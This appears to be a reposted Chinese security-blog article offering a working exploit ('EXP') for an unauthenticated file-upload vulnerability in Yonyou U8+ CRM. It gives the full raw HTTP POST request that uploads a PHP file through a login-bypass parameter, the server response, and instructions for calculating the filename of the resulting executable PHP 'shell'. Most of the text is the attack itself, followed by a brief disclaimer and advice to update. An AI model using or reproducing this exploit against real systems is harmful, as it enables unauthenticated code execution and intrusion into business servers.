用友U8+CRM页面是这个酱紫
EXP:
(这里有一点需要注意,上传的文件名test.php后边需要有个空格)
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1Host: 192.168.0.11:8072Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQContent-Length: 199------WebKitFormBoundarykS5RKgl8t3nwInMQContent-Disposition: form-data; name="file"; filename="test.php "Content-Type: text/plainphpinfo();------WebKitFormBoundarykS5RKgl8t3nwInMQ
上传成功响应包如下:
HTTP/1.1 200 OKDate: Fri, 25 Aug 2023 05:55:39 GMTServer: Apache/2.2.19 (Win32) PHP/5.4.38X-Powered-By: PHP/5.4.38Set-Cookie: PHPSESSID=9r6frr15q71vc034iicagf9pe1; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheVary: Accept-Encoding,User-AgentContent-Length: 123Content-Type: text/html; charset=utf-8{"success":true,"code":"","message":"","files":[],"filePath":"D:\U8SOFT\turbocrm70\code\www\tmpfile\mhtC202.tmp.mht"}=====================================说明:上传之后返回的路径为:D:\U8SOFT\turbocrm70\code\www\tmpfile\文件名称为:mhtC202.tmp.mht直接访问这个文件不解析,需要访问另一个文件// 上传之后会在目录下生成两个文件tmp.mht和tmp.php文件访问的解析文件格式为udp***.tmp.php星号部分为返回的文件名的十六进制减去一例如:B356——>45910(十六进制),45909(十六进制减一)——>b355======================================
Success~
shell地址:
http://192.168.2.11:81/tmpfile/updc201.tmp.phphttps://mp.weixin.qq.com/s/iCkvHKl-QC5o3gj_t02tmg建议及时更新至最新版本!原文始发于微信公众号(哪都通安全):叮~你有新的速递!某友0day上传漏洞(附EXP)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论